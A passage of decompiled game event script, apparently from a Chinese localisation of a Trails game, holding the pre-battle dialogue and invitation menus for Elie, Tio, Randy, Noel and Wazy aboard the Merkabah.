OP_AF(0xD4) Jump("loc_3324") label("loc_3312") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A1, 2)), scpexpr(EXPR_END)), "loc_3322") OP_AF(0xD3) Jump("loc_3324") label("loc_3322") OP_AF(0xD2) label("loc_3324") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_3510") label("loc_3333") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3353") OP_AF(0xDC) RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_3510") label("loc_3353") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_3367") Jump("loc_3510") label("loc_3367") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3510") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_346C") ChrTalk( 0x14, ( "我也很清楚,\x01", "如今的状况实在\x01", "是不容乐观……\x02", ) ) CloseMessageWindow() ChrTalk( 0x14, ( "不过,警察、教会、警备队、黑月……\x01", "甚至连『神狼』和『银』都\x01", "站在了我们这边。\x02", ) ) CloseMessageWindow() ChrTalk( 0x14, ( "集结了这么多的伙伴,\x01", "让我不禁开始觉得,无论面对什么\x01", "挑战,我们都可以顺利取得成功。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x0, 2) Jump("loc_3510") label("loc_346C") ChrTalk( 0x14, ( "警察、教会、警备队、黑月……\x01", "甚至连『神狼』和『银』都\x01", "站在了我们这边。\x02", ) ) CloseMessageWindow() ChrTalk( 0x14, ( "集结了这么多的伙伴,\x01", "让我不禁开始觉得,无论面对什么\x01", "挑战,我们都可以顺利取得成功。\x02", ) ) CloseMessageWindow() label("loc_3510") Jump("loc_3254") label("loc_3515") TalkEnd(0x14) Return() # Function_19_3247 end def Function_20_3519(): pass label("Function_20_3519") Call(0, 21) Return() # Function_20_3519 end def Function_21_351D(): pass label("Function_21_351D") TalkBegin(0x15) RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_352A") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_36FC") FadeToDark(300, 0, 100) Menu( 0, -1, -1, 1, ( "对话\x01", # 0 "改造·合成\x01", # 1 "放弃\x01", # 2 ) ) MenuEnd(0x0) Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_3580") OP_60(0x0) FadeToBright(300, 0) OP_0D() label("loc_3580") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_35A0") OP_AF(0xDD) RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_36F7") label("loc_35A0") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_35B4") Jump("loc_36F7") label("loc_35B4") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_36F7") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_3687") ChrTalk( 0x15, ( "在明天的作战中,\x01", "最大的问题显然还是\x01", "那三架『神机』。\x02", ) ) CloseMessageWindow() ChrTalk( 0x15, ( "想办法击退那些『神机』,\x01", "正是潜入市内的关键。\x02", ) ) CloseMessageWindow() ChrTalk( 0x15, ( "我们到时会和各方势力联手作战,\x01", "无论如何都要取得成功。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x0, 3) Jump("loc_36F7") label("loc_3687") ChrTalk( 0x15, ( "想办法击退那三架『神机』,\x01", "正是潜入市内的关键。\x02", ) ) CloseMessageWindow() ChrTalk( 0x15, ( "我们到时会和各方势力联手作战,\x01", "无论如何都要取得成功。\x02", ) ) CloseMessageWindow() label("loc_36F7") Jump("loc_352A") label("loc_36FC") TalkEnd(0x15) Return() # Function_21_351D end def Function_22_3700(): pass label("Function_22_3700") EventBegin(0x0) Fade(500) OP_68(100420, 1000, -101760, 0) MoveCamera(47, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(15480, 0) SetChrPos(0x101, 100110, 0, -101660, 180) SetChrSubChip(0x10, 0x2) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_3BB1") ChrTalk( 0x10, ( "#12P#00106F解放克洛斯贝尔市作战……\x01", "明天就要正式开始了。\x02\x03", "#00108F如果能见到贝尔和迪塔叔叔,我一定要问出\x01", "他们策动这一系列事件的真正目的……\x01", "而且还要尽力说服他们。\x02\x03", "#00101F可是,如果无法说服成功……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00006F#5P……对立恐怕就是不可避免的了。\x02", ) CloseMessageWindow() ChrTalk( 0x10, ( "#12P#00103F嗯……我早已\x01", "有所觉悟了。\x02\x03", "#00108F为了报答那些不顾自身安危,\x01", "向我们伸出援手的人们……\x02\x03", "#00101F更为了夺回小琪雅,\x01", "我们是绝对\x01", "不能输的。\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0xFFFF) Sleep(500) ChrTalk( 0x101, ( "#00004F#5P……艾莉。\x02\x03", "#00000F你不必将这一切都扛在自己肩上。\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, "#12P#00105F哎……\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F#5P不管是迪塔先生还是玛丽亚贝尔小姐,\x01", "对我们而言,也都是很亲近的熟人。\x02\x03", "#00001F所以说,这份重担并不是只属于你一个人的,\x01", "应该由我们大家一起来背负。\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, "#12P#00108F罗伊德……\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#00002F……明天一起加油吧,艾莉,\x01", "我和大家都会陪在你身边的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, ( "#12P#00104F……呵呵,嗯。\x02\x03", "#00102F谢谢,罗伊德。\x01", "多亏你的劝慰,我感觉轻松了一些。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00009F#5P哈哈……不用客气。\x02", ) CloseMessageWindow() OP_63(0x10, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0x10) Sleep(500) ChrTalk( 0x10, ( "#12P#00106F(……那、那个,罗伊德。)\x02\x03", "#00112F(做完准备工作之后,\x01", " 你可以来甲板一趟吗?)\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00005F#5P(哎……?)\x02", ) CloseMessageWindow() ChrTalk( 0x10, ( "#12P#00113F(如果方便……\x01", " 我有些话,想单独和你\x01", " 谈一谈……)\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 5) Jump("loc_3C2C") label("loc_3BB1") ChrTalk( 0x10, ( "#12P#00112F(做完准备工作之后,\x01", " 你可以来甲板一趟吗?)\x02\x03", "#00113F(如果方便……\x01", " 我有些话,想单独和你\x01", " 谈一谈……)\x02", ) ) CloseMessageWindow() label("loc_3C2C") Menu( 0, -1, -1, 0, ( "接受艾莉的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3CDE") ChrTalk( 0x101, ( "#00002F#5P(……知道了,\x01", " 我稍后就会过去的。)\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, ( "#12P#00109F(……呵呵,谢谢,\x01", " 那我们就待会再见吧。)\x02", ) ) CloseMessageWindow() OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 3) Jump("loc_3D98") label("loc_3CDE") ChrTalk( 0x10, ( "#12P#00106F(……是吗。)\x02\x03", "#00102F(呵呵,不必在意,\x01", " 其实也不是什么大不了的事情。)\x02\x03", "#00104F(不过,如果你改变主意了,\x01", " 就再来和我说一声吧。)\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00000F#5P(好的,我会的。)\x02", ) CloseMessageWindow() OP_5A() label("loc_3D98") SetChrSubChip(0x10, 0x0) EventEnd(0x5) Return() # Function_22_3700 end def Function_23_3D9F(): pass label("Function_23_3D9F") EventBegin(0x0) Fade(500) OP_68(-3160, -500, 6480, 0) MoveCamera(52, 29, 0, 0) OP_6E(500, 0) SetCameraDistance(16170, 0) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 6)), scpexpr(EXPR_END)), "loc_3DE1") SetChrSubChip(0xB, 0x1) label("loc_3DE1") SetChrPos(0x101, -3610, -1500, 5780, 0) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4250") ChrTalk( 0xB, ( "#11P#00203F(快速敲击键盘……)\x02\x03", "#00200F嗯,这样就准备得差不多了吧。\x02", ) ) CloseMessageWindow() OP_63(0xB, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(2000) OP_64(0xB) ChrTalk( 0xB, ( "#11P#00208F(咔嚓)\x02\x03", "#00203F……………………………………\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00005F缇欧……\x01", "你在做什么呢?\x02", ) ) CloseMessageWindow() OP_63(0xB, 0x0, 1700, 0x26, 0x26, 0xFA, 0x1) Sleep(1000) SetChrSubChip(0xB, 0x1) ChrTalk( 0xB, ( "#5P#00202F为了明天的突入行动,\x01", "我正在对梅尔卡瓦的系统\x01", "做最终检查。\x02\x03", "#00203F我到时也会离开梅尔卡瓦,\x01", "和大家一起作战……\x02\x03", "#00200F所以控制通讯终端之后的网络侵入\x01", "工作要交给约纳和芙兰来处理,\x01", "现在就要完成交接。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00003F这样啊……\x01", "真是辛苦你了。\x02\x03", "#00000F我能帮上什么忙吗?\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#5P#00203F……不,没什么。\x02\x03", "#00202F这些都是我擅长的工作,\x01", "而且还有约纳协助,人手足够了。\x02\x03", "#00204F罗伊德前辈只要摆出一副\x01", "队长的架势,威严地站在边上\x01", "看着就可以了。\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#12P#00006F那可不行啊,为了明天的作战,\x01", "还有好多事情需要准备呢。\x02\x03", "#00000F既然你这么有干劲,\x01", "这里就全部交给你了。\x02", ) ) CloseMessageWindow() OP_63(0xB, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0xB) Sleep(500) ChrTalk( 0xB, ( "#5P#00203F……对了,\x01", "我的确有件事想拜托罗伊德前辈。\x02\x03", "#00208F其实……我有点事\x01", "想和你商量。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00005F和我商量……?\x01", "你有什么烦恼吗?\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#5P#00206F……那个,在这里说话有些不方便。\x02\x03", "#00201F你忙完了手上的事情之后,\x01", "可以来梅尔卡瓦的\x01", "甲板吗?\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 6) ClearChrFlags(0xB, 0x10) Jump("loc_42C0") label("loc_4250") ChrTalk( 0xB, ( "#5P#00206F其实……我有点事\x01", "想和罗伊德前辈商量。\x02\x03", "#00201F你忙完了手上的事情之后,\x01", "可以来梅尔卡瓦的\x01", "甲板吗?\x02", ) ) CloseMessageWindow() label("loc_42C0") Menu( 0, -1, -1, 0, ( "接受缇欧的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_4352") ChrTalk( 0x101, ( "#12P#00002F知道了,\x01", "我很愿意陪你商量。\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#5P#00209F呵呵……\x01", "那就拜托了。\x02", ) ) CloseMessageWindow() OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 4) Jump("loc_43D9") label("loc_4352") ChrTalk( 0xB, ( "#5P#00204F……这样啊。\x01", "算了,这也没办法。\x02\x03", "#00202F如果愿意和我商量事情了,\x01", "就再来和我说一声吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#12P#00000F好的,我知道了。\x02", ) OP_5A() CloseMessageWindow() label("loc_43D9") SetChrSubChip(0xB, 0x0) EventEnd(0x5) Return() # Function_23_3D9F end def Function_24_43E0(): pass label("Function_24_43E0") EventBegin(0x0) Fade(500) OP_68(98200, 1000, 600, 0) MoveCamera(45, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(16090, 0) SetChrPos(0x101, 97510, 0, -530, 0) SetChrSubChip(0xE, 0x2) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_488C") ChrTalk( 0xE, "#5P#00300F哟,罗伊德。\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00000F兰迪,你们正在\x01", "检修武器吧?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00302F嗯,毕竟明天的作战可以算是\x01", "我们至今为止要面对的最大难关。\x02\x03", "#00304F有可能会用到『狂战士』,\x01", "为了预防万一,现在必须要\x01", "认真做好准备。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00005F唔,至今为止总是很忙,\x01", "一直都没时间维护武器……\x02\x03", "#00003F我是不是也应该趁着今晚,\x01", "好好检查一下旋棍呢?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00309F嗯,还是检查一下吧。\x02\x03", "#00303F虽说你的武器和来复枪不同,\x01", "不需要特别检修\x01", "精密部件……\x02\x03", "#00300F但就算只是擦拭一下,\x01", "手感也会有很大改善。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00009F哈哈,说得也是。\x02\x03", "#00005F话说回来,兰迪……\x01", "没想到你的心思还挺慎密的。\x02\x03", "#00000F不光是那把来复枪,\x01", "你好像连斧枪都会\x01", "坚持每天检查吧?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00302F嗯,检查武器可是\x01", "基础中的基础啊。\x02\x03", "#00304F一定要像对待绝世美女那样,\x01", "小心翼翼地温柔处理。\x02\x03", "#00300F不然的话,\x01", "说不定会在战场上\x01", "突然出现故障……\x02", ) ) CloseMessageWindow() OP_63(0xE, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0xE) ChrTalk( 0x101, ( "#12P#00011F……抱歉,我是不是\x01", "让你回想起了不愉快的往事?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00309F……哈哈,这有什么好道歉的。\x02\x03", "#00306F……嗯,话说回来……\x02\x03", "#00308F我差不多……也该把那些\x01", "事情告诉你了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#12P#00005F哎……?\x02", ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00300F你待会要是有空,\x01", "能不能来梅尔卡瓦的甲板一趟?\x02\x03", "我想让你\x01", "陪我聊聊。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 7) Jump("loc_48DE") label("loc_488C") ChrTalk( 0xE, ( "#5P#00300F你待会要是有空,\x01", "能不能来梅尔卡瓦的甲板一趟?\x02\x03", "我想让你\x01", "陪我聊聊。\x02", ) ) CloseMessageWindow() label("loc_48DE") Menu( 0, -1, -1, 0, ( "接受兰迪的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_49A7") ChrTalk( 0x101, ( "#12P#00002F……我知道了,\x01", "稍后就会过去。\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00309F哈哈,那我们就待会再见吧。\x02\x03", "#00302F等我检修完这东西之后,\x01", "马上就会过去的。\x02", ) ) CloseMessageWindow() OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 5) Jump("loc_4A41") label("loc_49A7") ChrTalk( 0xE, ( "#5P#00306F……这样啊。\x01", "算了,反正也不是什么\x01", "令人愉快的话题……\x02\x03", "#00300F不过,你要是改变主意了,\x01", "可以再来和我说一声。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#12P#00000F嗯,我知道了。\x02", ) CloseMessageWindow() OP_5A() label("loc_4A41") SetChrSubChip(0xE, 0x0) EventEnd(0x5) Return() # Function_24_43E0 end def Function_25_4A48(): pass label("Function_25_4A48") EventBegin(0x0) Fade(500) OP_68(100500, 1000, -240, 0) MoveCamera(45, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(16970, 0) SetChrPos(0x101, 100340, 0, -1010, 0) SetChrSubChip(0xF, 0x1) OP_93(0xC, 0xB4, 0x0) OP_4B(0xC, 0xFF) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_50AA") ChrTalk( 0xF, "#5P#10100F罗伊德警官,辛苦你了!\x02", ) CloseMessageWindow() ChrTalk( 0xC, "#5P#01902F辛苦啦~\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00000F你们也辛苦了,诺艾尔、芙兰。\x02\x03", "#00009F明天就要展开作战了,\x01", "但这里的气氛却很平和呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, ( "#5P#10102F真不好意思。\x02\x03", "#10106F我正在检修武器,\x01", "芙兰却突然跑了进来……\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#5P#01909F呵呵,我是来给\x01", "姐姐打气的~\x02\x03", "#01904F因为我已经做好了\x01", "充足的准备。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00004F哈哈,真是可靠啊。\x02\x03", "#00000F芙兰,你明天也要在\x01", "后援岗位上大显身手哦,\x01", "今天就尽量养精蓄锐吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#5P#01902F嗯,当然~\x01", "……其实,我就是为了\x01", "这个才来的~!\x02\x03", "#01909F不管怎么说,\x01", "我只要待在姐姐身边,\x01", "就可以补充能量了呢!\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) OP_63(0xF, 0x0, 1700, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#12P#00012F哈哈,也许\x01", "正如你所说。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, ( "#5P#10106F唉,真是的……\x01", "只要别妨碍到我就好。\x02\x03", "#10102F那、那个,罗伊德警官。\x01", "我今天晚上还要\x01", "再和司令联络一次。\x02\x03", "#10103F为了明天的作战,\x01", "还是再做一次最终确认为好。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00000F嗯,那就拜托你了。\x02\x03", "#00003F诺艾尔,你明天也要\x01", "和我们一起潜入市内……\x02\x03", "#00000F今天一定要做好充分准备,\x01", "然后早点休息。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, "#5P#10109F是!\x02", ) CloseMessageWindow() OP_63(0xC, 0x0, 2000, 0x18, 0x1B, 0xFA, 0x0) Sleep(2000) OP_64(0xC) ChrTalk( 0xC, ( "#11P#01905F(姐姐,姐姐!\x01", " 再这么下去,你们今天的谈话\x01", " 可就要结束了哦!)\x02\x03", "#01909F(这可是个难得的好机会啊,\x01", " 你想就这样白白浪费掉吗~?)\x02", ) ) CloseMessageWindow() OP_63(0xF, 0x0, 1700, 0x2, 0x7, 0x50, 0x1) Sound(28, 0, 100, 0) Sleep(1000) ChrTalk( 0xF, ( "#5P#10111F(什、什么好机会……\x01", " 芙兰,你别再乱说……!)\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x0, 0x1, 0xFA, 0x2) Sound(29, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#12P#00005F……嗯?怎么了?\x01", "难道出了什么问题吗?\x02", ) ) CloseMessageWindow() OP_63(0xF, 0x0, 1700, 0x28, 0x2B, 0x64, 0x0) Sleep(1000) OP_64(0xF) ChrTalk( 0xF, "#5P#10114F没、没有啦,那个……\x02", ) CloseMessageWindow() ChrTalk( 0xC, "#11P#01909F(加油呀,姐姐!)\x02", ) CloseMessageWindow() ChrTalk( 0xF, ( "#5P#10103F……那个……等你有空的时候,\x01", "可以来一趟甲板吗?\x02\x03", "#10101F虽然并不是很重要的事,\x01", "但我有件事情想拜托\x01", "罗伊德警官帮忙。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DB, 0) Jump("loc_5117") label("loc_50AA") ChrTalk( 0xF, ( "#5P#10103F……稍后……可以来甲板吗?\x02\x03", "#10101F虽然并不是很重要的事,\x01", "但我有件事情想拜托\x01", "罗伊德警官帮忙。\x02", ) ) CloseMessageWindow() label("loc_5117") Menu( 0, -1, -1, 0, ( "接受诺艾尔的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_520C") ChrTalk( 0x101, ( "#12P#00002F好啊,我知道了。\x01", "诺艾尔竟然有事情要拜托我,\x01", "这可真是稀奇……\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, "#11P#01909F(成功啦!姐姐!)\x02", ) CloseMessageWindow() ChrTalk( 0xF, ( "#5P#10114F那、那么……\x01", "我处理完手边的事情之后\x01", "就会过去的……\x02", ) ) CloseMessageWindow() OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 6) Jump("loc_52E0") label("loc_520C") ChrTalk( 0xF, ( "#5P#10106F……这、这样啊……\x02\x03", "#10112F不、不用放在心上!\x01", "真的不是很重要\x01", "的事情。\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#5P#01906F唔~这也没办法~\x02\x03", "#01901F罗伊德警官,你要是\x01", "改变主意了,就再去\x01", "和姐姐说一声吧~\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#12P#00000F嗯,我知道了。\x02", ) CloseMessageWindow() OP_5A() label("loc_52E0") SetChrSubChip(0xF, 0x0) OP_93(0xC, 0x10E, 0x0) OP_4C(0xC, 0xFF) EventEnd(0x5) Return() # Function_25_4A48 end def Function_26_52F2(): pass label("Function_26_52F2") EventBegin(0x0) Fade(500) OP_68(102260, 800, -94610, 0) MoveCamera(48, 19, 0, 0) OP_6E(500, 0) SetCameraDistance(16290, 0) SetChrPos(0x101, 100450, 0, -95200, 90) SetChrSubChip(0x8, 0x2) SetChrSubChip(0xA, 0x1) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_595F") ChrTalk( 0x101, ( "#6P#00005F瓦吉、阿巴斯……\x01", "你们在喝酒吗?\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#11P#10404F嗯,因为我们已经\x01", "完成了必要的准备工作。\x02\x03", "#10402F呵呵,你要不要也来一杯?\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#6P#00006F喂喂……明天还要作战呢,\x01", "你们这样没问题吗?\x02\x03", "#00001F边上已经摆着很多\x01", "被你们喝空的杯子了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#5P#12100F不必担心,\x01", "这是让维恩图斯特地\x01", "调制的无酒精鸡尾酒。\x02\x03", "不会对明天的作战\x01", "造成任何影响。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#6P#00006F啊,是这样啊……\x02\x03", "#00000F算啦,既然阿巴斯这么说,\x01", "那我这次就相信了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#11P#10409F呵呵,我一个人喝的时候,\x01", "你也应该相信啊。\x02\x03", "#10403F……对了,有件事情还是\x01", "通知你一声比较好。\x02\x03", "#10400F关于明天的作战,法王阁下\x01", "已经下达了正式的参战许可。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#6P#00005F啊……是吗。\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#5P#12100F梅尔卡瓦的主要用途是执行\x01", "隐秘活动,本应尽量避免将其\x01", "使用于大规模的作战中……\x02\x03", "但考虑到整个大陆的混乱状况,\x01", "就算稍微有所暴露,也是没有办法。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#6P#00006F这样啊……\x01", "教会能做出这种判断,真是值得感谢。\x02\x03", "#00013F……总之,明天就要决战了,\x01", "还请二位助我一臂之力。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, "#11P#10402F呵呵,明白了,队长。\x02", ) CloseMessageWindow() ChrTalk( 0x8, "#5P#12102F我们自然会全力相助。\x02", ) CloseMessageWindow() OP_63(0xA, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0xA) ChrTalk( 0xA, ( "#11P#10403F对了……我刚想起来。\x01", "还有另外一件事,\x01", "也应该告诉你。\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1) OP_63(0x8, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1) Sleep(1000) ChrTalk( 0x101, "#6P#00005F哎……?\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#5P#12100F……瓦吉,\x01", "那件事情在目前\x01", "仍属于机密事项哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#11P#10405F哎,这样啊?\x02\x03", "#10409F呵呵,既然如此,\x01", "那我就只能偷偷地告诉你了。\x02", ) ) CloseMessageWindow() OP_63(0x8, 0x0, 2000, 0xE, 0xF, 0xFA, 0x2) Sound(23, 0, 100, 0) OP_63(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x8, ( "#5P#12100F……算了,既然瓦吉都\x01", "这么说了,那也没办法。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#6P#00012F我、我完全听不懂\x01", "你们在说什么……\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#11P#10404F呵呵,这件事情\x01", "与你们有很大关系。\x02\x03", "#10402F如果你有兴趣,\x01", "待会就去甲板上等我吧,\x01", "这样我就可以偷偷告诉你了。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DB, 1) Jump("loc_59DE") label("loc_595F") ChrTalk( 0xA, ( "#11P#10404F还有另外一件事,\x01", "也应该告诉你。\x02\x03", "#10402F呵呵,如果你有兴趣,\x01", "待会就去甲板上等我吧,\x01", "这样我就可以偷偷告诉你了。\x02", ) ) CloseMessageWindow() label("loc_59DE") Menu( 0, -1, -1, 0, ( "接受瓦吉的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_5B01") ChrTalk( 0x101, ( "#6P#00006F……我知道了,\x01", "去甲板等你是吧?\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, "#11P#10409F呵呵,就这么定了。\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#5P#12100F瓦吉,谨慎起见,我话说在先,\x01", "你绝不能再泄露更多了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( 